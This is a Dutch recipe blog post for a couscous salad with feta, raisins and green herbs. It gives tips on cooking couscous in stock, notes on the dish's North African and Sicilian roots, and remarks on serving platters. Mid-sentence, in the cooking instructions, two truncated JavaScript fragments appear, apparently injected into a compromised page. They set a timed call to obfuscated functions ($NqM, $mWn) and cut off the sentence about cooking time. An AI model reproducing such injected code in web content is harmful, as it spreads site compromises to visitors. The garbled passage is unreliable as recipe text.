Deze heerlijke couscous salade staat snel op tafel zodat je zo lang mogelijk van de zon kan genieten. Je kunt deze salade goed van te voren klaar maken als bijgerecht. Een kleine tip: Het allerlekkerst is deze salade met een lamsrackje van de BBQ. Probeer het zelf eens uit.
Hoe maak je couscous?
Vaak staat er op de verpakking dat je het in water moet koken. Zelf maak ik altijd bouillon om extra smaak mee te geven. Enkel garen in bouillon is vaak voldoende om goed te garen. Je hoeft het niet per se te koken, maar als je dit dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wil dan is 2-3 minuten lang zat. De verhoudingen zijn ongeveer 100 gram couscous met één deel water/ bouillon. Je kunt het zowel warm als koud serveren.
Traditioneel wordt dit oude gerecht veel gegeten in Noord-Afrika en op Sicilië. Een echt nationaal gerecht zoals aardappelgerechten voor veel westerse landen. Couscous wordt over de hele wereld op verschillende manieren klaargemaakt; pittig, zoet, met vis en vlees. Alle combinaties zijn mogelijk, probeer vooral uit wat je zelf het lekkerst vindt.
Grote schalen en borden
Ik ben echt dol op servies, grote schalen en keramiek. Elke keer als ik weer iets tegen kom dan houd ik mezelf voor dat ik echt geen ruimte meer in de servieskast heb. Toch weet ik elke keer nog een plekje te vinden en de borden stapelen zich inmiddels flink op.
Als ik voor grote gezelschappen kook, gebruik ik altijd grote platte borden om uit te serveren. Dit ziet er niet alleen leuk uit, maar het is ook gewoon heel erg makkelijk. Waar ik deze koop? Echt overal! Op marktjes in het buitenland, maar ook IKEA heeft zo nu en dan leuke items!
Geen Reacties op "Couscous salade met feta, rozijnen en groene kruiden"